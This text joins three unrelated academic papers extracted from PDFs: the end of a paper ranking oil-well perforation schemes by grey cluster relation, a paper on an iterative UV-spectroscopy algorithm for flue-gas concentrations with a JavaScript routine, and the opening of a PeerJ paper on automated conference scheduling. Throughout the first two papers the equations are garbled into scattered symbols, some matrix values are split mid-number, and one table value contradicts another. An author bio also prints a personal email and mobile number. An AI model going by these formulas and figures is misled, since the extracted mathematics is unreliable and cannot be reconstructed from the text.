' 1 1 ln( ) ln(n) n i ij ij j ij ij m ij j E r r r r r               In particular, when '' 0 ij r  , let '' ''ln( ) 0 ij ij r r  . 1 1 1 (1 ) i i m i i E i m E         And 0 1 i   , 1 2 m 1      , 1 6m  . Establish an evaluation function Zk: ' i 1 , 1 , 1 m k ik i Z r i m k n        When the evaluation function value Z(Rk) is larger, the corresponding scheme is better. The program has the largest value of Z(k) is chosen as the final construction program. III. SIMULATION EXPERIMENT White XX well in Chang-qing Oilfield, the reservoir depth of middle layer is 1 884.5m, the total thickness is 9.5 m, the thickness of the perforated zone is 3.0 m, the porosity is 13.41%, reservoir drainage radius is 200m, well-bore radius is 0.111 m, the pressure of formation is 13.073 MPa, the crude oil saturation pressure is 9.86 MPa, drilling pollution depth is 69.5mm, the drilling pollution degree is 0.6. The casing strength is 47.8MPa, reservoir heterogeneity is 0.7( vertical permeability / horizontal permeability), the water saturation is 30.21%, rock Poisson's ratio is 0.5, the inclination is 5º, the oil viscosity is 1.03 MPa.S, the perforation optimization scheme is shown as Table 1. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 89 TABLE I. PERFORATION TABLE OF WHITE XX Attributes Program productivity ratio perforation phase angle （degree） shot density （holes/m） perforation penetration （mm） perforation diameter （mm） casing strength decreasing coefficient（%） A1 0.5193 120 26 328.68 10.68 5.00 A2 0.5188 90 26 328.68 10.68 6.10 A3 0.5152 120 32 328.68 10.68 5.70 A4 0.5150 60 26 328.68 10.68 5.70 A5 0.5147 90 32 328.68 10.68 5.30 A6 0.5108 60 32 328.68 10.68 5.00 A7 0.5071 120 36 328.68 10.68 4.50 A8 0.5065 90 36 328.68 10.68 4.20 A9 0.5045 120 26 267.55 9.42 4.60 A10 0.5039 90 36 267.55 9.42 4.30 A11 0.5024 60 26 328.68 10.68 4.00 A12 0.5001 120 32 267.55 9.42 4.00 A13 0.4998 60 36 267.55 9.42 4.10 A14 0.4995 90 32 267.55 9.42 3.80 A15 0.4952 60 32 267.55 9.42 3.60 A16 0.4912 120 26 267.55 9.42 3.10 A17 0.4905 90 26 267.55 9.42 3.00 A18 0.4874 120 16 328.68 10.68 2.60 A19 0.4867 90 16 328.68 10.68 2.50 A20 0.4861 60 26 267.55 9.42 2.90 A21 0.4821 60 16 328.68 10.68 2.40 A22 0.4695 120 16 267.55 9.42 1.80 A23 0.4688 90 16 267.55 9.42 1.80 A24 0.4637 60 16 267.55 9.42 1.70 The initial feature matrix 6 24(x ) ij D  can be constructed from the data in Table 1 and the results are shown in Table 2. The feature object matrix 6 24( )ijR r  is established by the above equation (4) - (6) and the initial feature matrix D, is shown as table 3. The index data association matrix is established by the above equations (7) and (8): 1 0.9953 0.9499 0.9937 0.9937 0.9976 1 0.5841 0.8571 0.8571 0.9176 1 0.7747 0.7747 0.9602 1 1 0.9696 1 0.9696 1                     According to the correlation degree matrix, take the critical value 0.8r , R2, R4 and R5 can be regarded as same class, then take R2 represent this class. Then the influencing attributes of perforation program are adjusted to: productivity ratio R1, perforation phase angle R2, shot density R3, casing 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 90 strength decreasing coefficient R6. Establishing new normalization matrix R’=(rij)4×24, shown as table 4. TABLE II. ESTABLISH THE INITIAL FEATURE MATRIX D 0.5193 120 26 328.68 10.68 5.50 0.5188 90 26 328.68 10.68 6.10 0.5152 120 32 328.68 10.68 5.70 0.5150 60 26 328.68 10.68 5.70 0.5147 90 32 328.68 10.68 5.30 0.5108 60 32 328.68 10.68 5.00 0.5071 120 36 328.68 10.68 4.50 0.5065 90 36 328.68 10.6 D  8 4.20 0.5045 120 26 267.55 9.42 4.60 0.5039 90 36 267.55 9.42 4.30 0.5024 60 26 328.68 10.68 4.00 0.5001 120 32 267.55 9.42 4.00 0.4998 60 36 267.55 9.42 4.10 0.4995 90 32 267.55 9.42 3.80 0.4952 60 32 267.55 9.42 3.60 0.4912 120 26 267.55 9.42 3.10 0.4905 90 26 267.55 9.42 3.00 0.4874 120 16 328.68 10.68 2.60 0.4867 90 16 328.68 10.68 2.50 0.4861 60 26 267.55 9.42 2.90 0.4821 60 16 328.68 10.68 2.40 0.4695 120 16 267.55 9.42 1.80 0.4688 90 16 267.55 9.42 1.80 0.4637 60 16 267.55 9.42 1.70   T                                                                          TABLE III. ESTABLISHMENT OF FEATURE OBJECT MATRIX R 1 2 1.3 5.3767 8.4762 2.9412 0.9990 1.5 1.3 5.3767 8.4762 3.5882 0.9921 2 1.6 5.3767 8.4762 3.3529 0.9917 1 1.3 5.3767 8.4762 3.3529 0.9911 1.5 1.6 5.3767 8.4762 3.1176 0.9836 1 1.6 5.3767 8.4762 2.9412 0.9765 2 1.8 5.3767 8.4762 2.6471 0.9 R  754 1.5 1.8 5.3767 8.4762 2.4706 0.9715 2 1.3 4.3767 7.4762 2.7059 0.9703 1.5 1.8 4.3767 7.4762 2.5294 0.9675 1 1.3 5.3767 8.4762 2.3529 0.9630 2 1.6 4.3767 7.4762 2.3529 0.9624 1 1.8 4.3767 7.4762 2.4118 0.9619 1.5 1.6 4.3767 7.4762 2.2353 0.9536 1 1.6 4.3767 7.4762 2.1176 0.9459 2 1.3 4.3767 7.4762 1.8235 0.9445 1.5 1.3 4.3767 7.4762 1.7647 0.9386 2 0.8 5.3767 8.4762 1.5294 0.9372 1.5 0.8 5.3767 8.4762 1.4706 0.9361 1 1.3 4.3767 7.4762 1.7059 0.9284 1 0.8 5.3767 8.4762 1.4118 0 T .9041 2 0.8 4.3767 7.4762 1.0588 0.9028 1.5 0.8 4.3767 7.4762 1.0588 0.8929 1 0.8 4.3767 7.4762 1                                                                            TABLE IV. DEALS WITH THE FEATURE MATRIX BY GREY CLUSTER RELATION R’ ' 1 2 1.3 2.9412 0.9990 1.5 1.3 3.5882 0.9921 2 1.6 3.3529 0.9917 1 1.3 3.3529 0.9911 1.5 1.6 3.1176 0.9836 1 1.6 2.9412 0.9765 2 1.8 2.6471 0.9754 1.5 1.8 2.4706 0.9715 2 1.3 2.7059 0.9703 1.5 1.8 2.5294 0.9675 1 1.3 2.3529 0.9630 2 1.6 2.3529 R 0.  9624 1 1.8 2.4118 0.9619 1.5 1.6 2.2353 0.9536 1 1.6 2.1176 0.9459 2 1.3 1.8235 0.9445 1.5 1.3 1.7647 0.9386 2 0.8 1.5294 0.9372 1.5 0.8 1.4706 0.9361 1 1.3 1.7059 0.9284 1 0.8 1.4118 0.9041 2 0.8 1.0588 0.9028 1.5 0.8 1.0588 0.8929 1 0.8 1        T                                                                     The attribute weight vectors  =(0.0036,0.2826, 0.2797,0.4340) are calculated according to formulas (10) and (11). Then the evaluation function Z is established according to (12): Z={2.2090,2.2348,2.4716,2.1051,2.2282,2.0103, 2.2211,2.0032,2.1068,2.0288,1.6710,2.0375,1.8364,1.8451,1.6 527,1.7238,1.5569,1.4562,1.2894,1.3900,1.1225,1.2519,1.1105 ,0.9437}. The optimal scheme is A3 because the Z value of scenario A3 is the largest. It means under the existing formation conditions, the best perforation program is: perforation bullet SYD127-1, phase angle 120º, hole density 32m, wearing depth 328.68mm, aperture 10.68mm. IV. CONCLUSION In this paper, a Perforation plan-decision based on Grey Cluster Relation is putted forward. This method can be widely used to predict the productivity of wells under different perforation conditions, determine the perforating efficiency of perforated bombs, and study how different factors (the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 91 perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) impose influence to productivity ratio, and casing strength decreasing coefficient. According to the pending reservoir, it also let the oil production capacity to achieve the higher perforation operating parameters and process of excellent combination. It also saves a lot of manpower, materials and time cost, and provide the theoretical basis for the design of completion perforation construction. REFERENCES: [1] Deng Guang-yong. Application of Optimized Perforation Technology in Oilfield Production[J]. New Technology & New Products of China, 2015(17):90-90. [2] Tian Xin-ru. Influence of Optimization Design of Perforation Scheme on Oil and Gas Well Productivity[J]. China Petroleum and Chemical Standard and Quality, 2017, 37(3):22-23. [3] Cuan Ying, Wang Li-fan.Selection of Perforation Plan Based on MOPSO and TOPSIS Decision Making[J]. Science Technology and Engineering, 2013, 13(25):7302-7306. [4] Wang Zhong. The Application of Fuzzy Multiple Attribute Decision Making to Optimization of perforated completion[D]. Xi’an Shiyou University, 2008. [5] Chou J R. Kansei Clustering Using Fuzzy and Grey Relation Algorithms[J]. Journal of Interdisciplinary Mathematics, 2015, 18(6):719-735. [6] Gong Y C, Ren Z Y, Fei D, et al. Grey relation-projection pursuit dynamic cluster method for multiattribute decision making assessment with trapezoidal intuitionistic fuzzy numbers[J]. Control & Decision, 2015. [7] Xiao-Jing L I, Liu L J. Comprehensive Quality Evaluation of Intersections Based on Grey Relation Degree Clustering[J]. Journal of Shandong Jiaotong University, 2013. [8] GUO San-dang,WANG Ling-ling,LIU Si-fen et al.Grey Cluster Analysis Base on the Biggest Relational Grades[J]. Mathematics in Practice and Theory, 2013, 43(6):195-201. [9] LI Xue-mei; DANG Yao-guo; WANG Jun-jie.Grey relational clustering model for panel data clustering on indicators and its application[J]. Control and Decision, 2015, 30(8):1447-1452. [10] Li Xue-mei. Grey multivariable modeling and its application[D]. Nanjing University of Aeronautics and Astronautics The Graduate School College of Information Science and Technology, 2015. work_i4ok4yixpfbr5fdsfgea7qhnly ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 83 The Researchof a New Iteration of the Circular Algorithm Xu Shuping School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 563937848@qq.com Huang Menyao School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Chen Li School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Xu Pei School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Abstract—It is a problem of spectra analysis of flue gas that how to separate and calculate the concentration of different kinds of gas from continuous mixed gas absorption spectrum signal. So based on experimental data, a new iteration of the circular algorithm is put forward on the basis of Lambert-Beer's law. The algorithm uses different UV-light wavelengths at 190nm-290nm for different characteristics of UV light with different absorption peaks. The iteration is repeated until the concentration difference between adjacent two gases is less than a certain value. It is considered that the elemental gas The exact concentration, and through the programming to achieve the results. it has strong anti-jamming capability and is suitable for practical application of engineering. Keywords—Circular Iteration; Characteristic Absorption Peak; Iterative Algorithm; Gas Concentration I. INTRODUCTION With the industrial production, centralized heating of boilers and the popularization of transportation tools, a large number of soot and toxic and harmful gases will be discharged. Hazardous substances accumulate gradually in the atmosphere and reach a certain concentration, which will make the normal composition of air change, thus endangering the health of human beings and various animals and plants. Various problems caused by air pollution have attracted the attention of environmental protection departments . In order to achieve accurate and real-time monitoring of environmental quality, ecological environment and pollution sources, and provide accurate basis for supervision and management of environmental protection departments at all levels and environmental decision-making of the government, a large number of modern environmental monitoring instruments are urgently needed. At present, there are three main methods for gas detection of portable spectrometers in domestic and foreign markets: differential algorithm, electrochemical analysis and infrared spectroscopy. Differential absorption algorithm can accurately calculate the concentration of most gases, but it will lose the broadband continuous absorption information in the characteristic absorption of gases, leading to some gas concentration measurement can not come out. For example, the absorption spectrum of nitrogen dioxide molecule in the ultraviolet band is mostly gradual continuous absorption, so differential absorption algorithm may think that the absorption information of nitrogen dioxide is filtered out by scattering, resulting in the detection of nitrogen dioxide. If the absorption curves of nitric oxide and nitrogen dioxide have the same absorption peaks, the fitting absorption curves are superimposed at the measuring points, so it is still impossible to distinguish the two gases. The electrochemical analysis method has the advantages of simple structure and easy operation. It mainly depends on gas sensors, a gas sensor can only detect a corresponding gas, and the sensitivity of gas sensors is high, but after a period of time, the sensitivity of sensors to gas will decline, it is necessary to replace gas sensors in time, and gas sensors are expensive, which increases the use cost for users. The main principle of gas sensor is to use the oxidation or reduction reaction of gas to generate current, but if there are both oxidizing gas and reducing gas, the measurement results will be inaccurate . Infrared spectroscopy overcomes the shortcomings of DOI: 10.21307/ijanmc-2019-039 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 84 electrochemical analysis, but can only measure the approximate concentration of nitrogen oxides, can not accurately measure the specific concentration of NO and NO2, and infrared spectroscopy for environmental humidity, temperature and other external conditions require higher technology is more complex . Based on defects and deficiencies of the above gas detection methods, an iterative evolution gas solution algorithm is proposed in this paper. According to the good absorption of ultraviolet light by gas at the wavelength of 190-290 nm, the number of absorbed photons can be obtained by measuring the ultraviolet light absorbed by gas. The actual concentration of gas can be obtained from the number of photons by using the iterative gas calculation algorithm. II. THE PINCIPLE AND COMPUTATIONAL PROCEDURE OF ITERATIVE ALGORITHMS A. Algorithm Principle Mixed gases have characteristic absorption peaks in the range of ultraviolet wavelength 190-290 nm. Gas absorbance has multiple superposition. Assuming that some elementary gas does not absorb other gases on its best characteristic absorption peak, the corresponding table of absorbance and concentration of this single substance gas is searched to obtain the initial concentration of the gas, and then switch to another characteristic absorption peak. The photon number of the gas is subtracted from the total photon number measured, and the initial concentration of another gas is obtained. By analogy, the initial concentration of each gas is obtained one by one. Then, the characteristic absorption peak of the first gas is returned to, and the absorption photon number of other gases is subtracted from the total photon number absorbed, and the iterative concentration of the first gas is obtained again. By analogy, the initial concentration of each elemental gas is obtained again. By repeating the iteration until the difference of gas concentration between two adjacent times is less than a certain value, it is considered that the concentration of the elemental gas is obtained. B. Algorithm Steps 1) The initial concentration 1c of the first elementary gas in the mixed gas is solved. According to the characteristic absorption peak of the gas at wavelength 1 , the number of photons B 1S absorbed by the gas is read.Solving the value of   DS DR   1 1 ( R is the number of incident photons; S is the number of photons passing through the medium.; D is the number of photons in dark spectrum(Also known as dark spectral noise);  is the wavelength of a certain ultraviolet wave, K is a constant, c is the concentration of elemental gas),The initial concentration 1c of the elemental gas was obtained by inquiring the comparison table of absorbance and gas concentration.. 2) The initial concentration 2c of the second primary gas in the mixed gas is solved. too, Select the characteristic absorption peak 2 of the elemental gas and read the absorption photon number 2S of the elemental gas.Assuming that there are only two gases in this band, According to the formula        DS DR DS DR DS DR        2 2 1 1 *   the absorbance of the second gas is calculated, and the concentration of the second gas is calculated by querying the absorbance and concentration table again, as the initial concentration 2c of the second gas. 3) Solve the concentration of other elemental gases in mixed gases. Methods 1 and 2. Selecting the characteristic peak absorption wavelength of other elemental gases and reading the number of absorbed photons at that wavelength.The absorbance was calculated by formula            DS DR DS DR DS DR DS DR DS DR A n n             *...*** 3 3 2 2 1 1   ( A is absorbance), and the initial concentration of gas was obtained by looking up the table. 4) Iterative Recursion of the Concentration of the First Element Gas.The concentration of all elemental gases obtained at present is substituted into the formula            DS DR DS DR DS DR DS DR DS DR n n               ... 3 3 2 2 1 1   and the corresponding 1S of wavelength 1 is read again. The iterative concentration 1c of the first elemental gas is obtained by checking the corresponding table of concentration absorbance. 5) Repeat 2) and 3) to find the iteration concentration 1mc of the elemental gas M. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 85 6) Calculate the error of the calculation results of the same elemental gas in the adjacent two times. The first-order iteration error of each elemental gas is calculated.  101 mmm cc    7) Repeat 4, 5 and 6 until the error of two iterations of the same gas concentration is less than 3%.  Gn    The last calculated gas concentration is regarded as the final concentration of various elemental gases. III. ALGORITHM VERIFICATION Figure 1. Mixed gas UV spectral absorption curve Fig.1 is the absorption spectra of NO , 2SO 3NH and 2NO mixed gases. Among them, 2N is a zero gas whose spectral line is called zero gas line. Zero gas is not absorbed in ultraviolet light of 190-290 nm. Because there is Rayleigh scattering in the gas to be detected, the influence of scattering can be eliminated by using the zero-gas line spectrum as the reference spectrum. From the observation in Fig.1, we can see that NO and 3NH can find non-interference absorption wavelengths. These two wavelengths are just the absorption peaks of NO and 3NH , and there is no NO absorption at the 3NH absorption peak, and there is no 3NH absorption at the NO absorption peak. So it is easy to distinguish the two gases if we only distinguish them.The problem now is that 2SO and 2NO both absorb at the absorption peaks of these two gases. At the wavelength of 220 nm, the maximum absorption peaks of NO and 2NO are close, and 2SO absorbs a lot of ultraviolet light in this section.So if we can know the concentration of 2SO and 2NO beforehand, we can use the superposition of absorbance to subtract the absorbance of NO and 3NH from the total absorbance of 2SO and 2NO . We can get the absorbance of NO and 3NH by looking up tables.Therefore, in order to obtain the specific concentration of various elemental gases in mixed gases, the concentration of 2SO and 2NO must be required first, and then the concentration of NO and 3NH can be calculated. In this way, the concentration of four kinds of elemental gases in the mixture can be calculated. A. Calculating the Concentrations of 2SO and 2NO 2NO and 2SO interfere with each other in the whole working band. Now it is assumed that there are two kinds of elemental gases in the mixture, 2NO and 2SO , respectively. It is now known that the absorption spectra of mixed gases at 231.33 nm and 273.33 nm, and the absorbance of gases 2NO and 2SO at 231.33 nm and 273.33 nm (231.33 nm and 273.33 nm, respectively, are the maximum absorbance of gases 2NO and 2SO at this point). Now calculate the respective concentrations of NO2 and SO2. Figure 2. Absorption spectra of SO2 and NO2 TABLE I. SPECTRAL TABLES FOR SO2 AND NO2 AT WAVELENGTH 273.33NM AND WAVELENGTH 231.33NM Wavelength 231.33 273.33 NO2 absorbance 0.03003444 0.00456189 SO2 absorbance 0.00482312 0.07984884 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 86 Figure 3. NO2 and SO2 gas concentration iterative algorithm flow chart Fig. 3 is the flow chart of the iterative algorithm for the concentration of 2NO and 2SO mixed gases. After several iterations, the real concentrations of these two gases can be calculated from the mixture. 1 2 3 4 5 6 70 10 20 30 40 50 60 Figure 4. SO2 concentration and the number of iterations curve 1 2 3 4 5 6 70 239 240 241 242 243 244 245 246 247 248 Figure 5. NO2 concentration and the number of iterations curve After two iterations, the numerical value of the algorithm tends to be stable, and the precise gas concentrations of 2NO and 2SO are basically obtained. B. Calculating the Gas Concentrations of NO and 3NH There is no interference between NO and 3NH at their maximum absorption peaks, so the total absorbance and the concentration of 2NO and 2SO can be calculated according to the superposition of ultraviolet light. Assuming that the concentrations of 2NO and 2SO in mixed gases are 1c and 2c , respectively, and the concentrations of NO and 3NH are 3c and 4c , the multivariate superposition of absorbance at wavelength 225.88 nm can be obtained as follows:  321 AAAA    1A is the absorbance of 2NO at 225.8 nm in 1c concentration, 2A is the absorbance of 2SO at 225.8 nm in 2c concentration, A is the total absorbance of mixed gas at 225.88 nm and 3A is the total absorbance of NO at 225.88 nm.  0 3 1 2 1 2 lg( ) I I A A A A A A        0I is the spectral intensity at 225.88 nm through zero gas, I is the transmission intensity at 225.88 nm through the mixture gas to be measured, the intensity can be obtained directly by spectrometer, 2A and 3A are calculated by the concentration of 2SO and 2NO . In this way, the absorbance 3A of NO at 225.88 nm can be obtained, and then the concentration of NO can be calculated according to the corresponding table between the concentration of NO at 225.88 nm and the absorbance. The absorbance International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 87 4A of 3NH can be obtained by the same method at 208.23 nm, and the concentration of 3NH can be calculated according to the corresponding relationship between 3NH concentration and absorbance at 208.23 nm. C. Composition of Platform Experiment System Ultraviolet flue gas analyzer consists of three parts: flue gas data acquisition module, data processing module and data display module. Figure 6. Experimental system composition diagram The data acquisition module is composed of ultraviolet light source and marine optical Maya2000 Pro ultraviolet spectrometer. Ultraviolet light source outputs stable ultraviolet light. Ultraviolet light passes through the optical fiber through the detected gas. After the gas is fully absorbed, the remaining ultraviolet light is transmitted into the ultraviolet spectrometer by the optical fiber. After the optical processing and photoelectric conversion of the gas by the spectrometer, the gas information becomes an electrical signal, waiting for the data processing module to read. In this system, the ultraviolet spectrometer is actually a flue gas acquisition sensor. Data processing module is composed of embedded development board. The embedded development board reads the gas information from the ultraviolet spectrometer, calculates the actual concentration of the elemental gas through the iterative algorithm, and visualizes it through the data display module. This is the composition and working principle of the experimental system. D. Absorption Spectroscopy of Elemental Gas and Zero Gas 2N is introduced into the system, and its absorption spectrum is measured when the gas concentration is stable. After that, the number of photons absorbed by 2NO , NO , 2SO and 3NH gases was measured in turn, and the curve was drawn by using the number and wavelength of photons. Figure 7. Four gas photon spectrum line graph E. Data Verification The following data are obtained when a mixture of 2SO and NO is injected into the experimental system. TABLE II. 200 PPM SO2 AND NO GAS SPECTRAL DATA 271.98nm 225.94nm dark noise zero gas 56434 43973 2900 SO2 100ppm 52851 42754 2900 zero gas 56434 43973 2900 NO2 100ppm 56386 40749 2900 Table 2 shows the number of absorbed photons and dark noise photons at 271.98 and 225.94 nm measured by ultraviolet spectrometer in a mixture of 2SO and 2NO at 100 ppm, respectively. TABLE III. SPECTRAL DATA FOR MIXED GAS 271.98nm 225.94nm dark noise zero gas 56434 43973 2900 mixed gas 52050 39588 2900 Table 3 shows the number of absorbable photons at 271.98 nm and 225.94 nm for zero and mixed gases, as well as the number of dark spectral noise photons measured by spectrometer. In practical calculation, the number of photons measured should be subtracted from the number of photons of dark spectral noise to obtain the actual number of photons of zero gas and mixed gas. Based on the above data, the photon number absorption curves of elemental gases at their maximum absorption peaks are fitted. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 88 100 200 300 400 500 600 7000 20000 40000 60000 80000 100000 120000 160000 140000 Figure 8. Fitting curve of SO2 at 271.98 nm 100 200 300 400 500 6000 20000 40000 60000 80000 100000 120000 160000 140000 Figure 9. Fitting curve of NO at 225.94 nm 100 200 300 400 500 600 7000 2000 4000 6000 8000 10000 12000 16000 14000 Figure 10. Fitting curve of NO at 271.98 nm 50 100 150 200 250 300 3500 100000 200000 300000 400000 500000 600000 800000 700000 Figure 11. Fitting curve of NH3 at 271.98 nm Figure 8-11 is a curve drawn by a single gas at the maximum absorption wavelength of ultraviolet light. Analysis table of experimental results TABLE IV. ANALYSIS OF RESULTS gas species standard value （ppm） measured value （ppm） difference value maximum difference error SO2 102 104 2 -4 0.8% 200 196 -4 499 501 2 NO 104 108 4 -7 1.4% 200 206 6 500 493 -7 NO2 116 112 -4 -9.7 1.94% 201.5 195 -6.5 501.7 493 -9.7 NH3 50 53 3 3 1.5% 200 199 -1 conclusion Accuracy error is less than 3%, which meets the design standard. In Table 4, the standard value is the concentration of the standard elemental gas put in the test, and the measured value is the concentration of the elemental gas calculated from the mixed gas using an iterative algorithm. From the experimental results, it can be seen that the maximum error of the measured value is less than the standard value, and the maximum error of the accuracy is 1.94%, which is much less than the original design standard of 3%, which is within the normal standard. IV. SOFTWARE IMPLEMENTATION The software algorithm is written in JavaScript, including the analysis and implementation process of the iterative algorithm gas. The main code is as follows: /* *Iterative calculation of gas concentration */ function GetGasC() { //1. Obtain absorbance from NO2 var NO2A_1 = GetAByWa(gasWavebanc['NO2']); //2. Find the concentration of this point var NO2C_1, NO2A_2, SO2A_2, SO2C_2, SO2A_1, ONA_3, NH3A_4, ONC_3, NH3C_4; for(var i = 0; i < 2; i++) { NO2C_1=GetCByA_Data(NO2_data_231, NO2A_1); //3.Calculate the absorbance of NO2 at 273.33. //NO2A_2; NO2A_2= getAByC_Data(NO2_data_273, NO2C_1); International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 89 //4. Obtain the total absorbance of SO2 in the optimum band and subtract the absorbance of NO2 here. SO2A_2=GetAByWa(gasWavebanc["SO2"]) -NO2A_2; //5. Looking up Table to Find DeSO2C_1 SO2C_2 = GetCByA_Data(SO2_data_273, SO2A_2); //6. The absorbance of SO2 at 231.33 was obtained by //looking up the table. SO2A_1 = getAByC_Data(SO2_data_231, SO2C_2); //7. NO2A_1 is the total absorbance minus the //absorbance of SO2A_1 at 231.33. NO2A_1 = NO2A_1 - SO2A_1; } currentGasC_NO2 = NO2C_1; currentGasC_SO2 = SO2C_2; //The absorbance of NO at the optimum band is the //total absorbance S-SO2 absorbance minus the //absorbance of NO2. ONA_3 = GetAByWa(gasWavebanc["NO"]) - getAByC_Data(NO2_data_225, NO2C_1) - getAByC_Data(SO2_data_225, SO2C_2); //Concentration of NO obtained currentGasC_NO = GetCByA_Data(NO_data_225, ONA_3); NH3A_4 = GetAByWa(gasWavebanc["NH3"]) - getAByC_Data(NO2_data_208, NO2C_1) - getAByC_Data(SO2_data_208, SO2C_2); currentGasC_NH3 = GetCByA_Data(NH3_data_208, NH3A_4); $("#NO2_C").html("No2 " + currentGasC_NO2); $("#SO2_C").html("So2 " + currentGasC_SO2); $("#NO_C").html("NO " + currentGasC_NO); $("#NH3_C").html("NH3 " + currentGasC_NH3); } V. CONCLUSION Aiming at the detection requirement of main harmful components in air pollution, a fast iteration algorithm of mixed flue gas is designed by using the continuous frequency division method of ultraviolet grating in the experimental system, and the effectiveness of the algorithm is verified. Ultraviolet spectrometer is used as a sensor. The embedded development board reads and calculates the gas concentration. The analysis and calculation of the algorithm are realized by programming. The results show that the iterative algorithm can accurately measure the concentration of flue gas and keep the error within 3%. It can meet the design requirements and solve many kinds of gases at the same time. It is suitable for practical engineering applications. ACKNOWLEDGMENT Thank you, Shaanxi Education Department. This work was supported in part by a grant from Shaanxi Provincial Department of Education Project (15JF019). The authors wish to thank the cooperators. This research is partially funded by the Project funds in shanxi province department of education (15JF019), a the Project funds in engineering laboratory project (GSYSJ2018011) and the project funds in innovation and entrepreneurship training for college students (1070214033) ABOUT THE AUTHOR Xu Shuping (1974-), Female, Professor, School of Computer Science and Engineering, Xi'an Technological University, majoring in embedded and computer control. Email: 563937848@qq.com, Mobile: 13772148209. REFERENCES [1] Chen Zhi-gang. Discussion on Experimental Application of Lambert-Beer Law[J]. Acta Metrologica Sinica. 2015(1) [2] Pop,Paul. Embedded systems design:Optimization challenges.Lecture Notes in ComputerScience, 2014，35(24):16-20 [3] Shi Bao-song Sun Shou-hong Zhang Wei. Application of CCD in the portable spectrometer[J]. Electronic Measurement Technology. 2016(11) [4] Limited ARM Development Guide 2000-2001.ARM DOI.2013.06. [5] Tang Qu. “Research and design of ultraviolet flue gas analyzer [J]”. Nanjing University of Technology. 2013 [6] Jiang Xuqian. “Design of portable ultraviolet flue gas analyzer [J]”. Nanjing University of Technology. 2012 [7] Chen Bin. “Design of ultraviolet flue gas analyzer [J]”.Nanjing University of Technology. 2016 [8] Juwu ,Wu Yihui. Micro-miniaturization of spectrometer [J]. Journal of Instrumentation, 2013. 22 (4): 131-133 [9] Yu Zhiqiang, Wenzhi Yu, Xie Yingke, Zhou Suyi. The control system of multi-parameter water quality tester based on raspberry pie [J]. Instrumentation technology and Sensors, 2015 (06): 20-23. [10] Han Xiao, Wenzhi Yu, Xie Yingke, Wei Kanglin, Zhou Xiaofeng. Software design of control and signal processing system for multi-parameter water quality tester [J]. Instrumentation technology and Sensors, 2014 (08): 20-22 work_i5qooiji7zh7lmzgdqg6bxvhf4 ---- Submitted 21 January 2019 Accepted 15 October 2019 Published 11 November 2019 Corresponding author Prashanti Manda, p_manda@uncg.edu Academic editor Christopher Mungall Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.234 Copyright 2019 Manda et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation Prashanti Manda1, Alexander Hahn2, Katherine Beekman3 and Todd J. Vision4 1 Department of Computer Science, University of North Carolina at Greensboro, Greensboro, NC, United States of America 2 Department of Computer Science, University of Southern California, Los Angeles, United States of America 3 ROI Revolution Inc., Raleigh, NC, United States of America 4 Department of Biology, University of North Carolina at Chapel Hill, Chapel Hill, NC, United States of America ABSTRACT Conferences with contributed talks grouped into multiple concurrent sessions pose an interesting scheduling problem. From an attendee’s perspective, choosing which talks to visit when there are many concurrent sessions is challenging since an individual may be interested in topics that are discussed in different sessions simultaneously. The frequency of topically similar talks in different concurrent sessions is, in fact, a common cause for complaint in post-conference surveys. Here, we introduce a practical solution to the conference scheduling problem by heuristic optimization of an objective function that weighs the occurrence of both topically similar talks in one session and topically different talks in concurrent sessions. Rather than clustering talks based on a limited number of preconceived topics, we employ a topic model to allow the topics to naturally emerge from the corpus of contributed talk titles and abstracts. We then measure the topical distance between all pairs of talks. Heuristic optimization of preliminary schedules seeks to balance the topical similarity of talks within a session and the dissimilarity between concurrent sessions. Using an ecology conference as a test case, we find that stochastic optimization dramatically improves the objective function relative to the schedule manually produced by the program committee. Approximate Integer Linear Programming can be used to provide a partially-optimized starting schedule, but the final value of the discrimination ratio (an objective function used to estimate coherence within a session and disparity between concurrent sessions) is surprisingly insensitive to the starting schedule. Furthermore, we show that, in contrast to the manual process, arbitrary scheduling constraints are straightforward to include. We applied our method to a second biology conference with over 1,000 contributed talks plus scheduling constraints. In a randomized experiment, biologists responded similarly to a machine-optimized schedule and a highly modified schedule produced by domain experts on the conference program committee. Subjects Artificial Intelligence, Computer Education, Data Mining and Machine Learning, Digital Libraries, Social Computing Keywords Topic modeling, Optimization, Conference scheduling How to cite this article Manda P, Hahn A, Beekman K, Vision TJ. 2019. Avoiding ‘‘conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation. PeerJ Comput. Sci. 5:e234 http://doi.org/10.7717/peerj-cs.234 https://peerj.com/computer-science mailto:p_manda@uncg.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.234 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.234 Figure 1 Two steps in the process of manually assigning talks to sessions for the 2017 American Physi- cal Society March Meeting. Photos courtesy of Dr. Karen Daniels. Photo credit to Dr. Daphne Klotsa. Full-size DOI: 10.7717/peerjcs.234/fig-1 INTRODUCTION Researchers and educators depend upon professional conferences to showcase their work and stay current on the work of their peers. Thousands of such conferences are held each year worldwide, and conferences that feature of hundreds of oral presentations are not unusual. Such large conferences often schedule oral presentations in concurrent sessions so that each presentation can be allocated adequate time while keeping the overall conference duration to only a few days. Conference scheduling is typically done manually by program organizers who review the large volume of talk submissions, decide which talks are similar to each other, and group similar talks into sessions accordingly (Fig. 1). They do this based on the information provided by prospective presenters, which invariably includes a title but may also include keywords, topic categories and/or an abstract. This is a tedious and often error-prone process, done in some cases under considerable 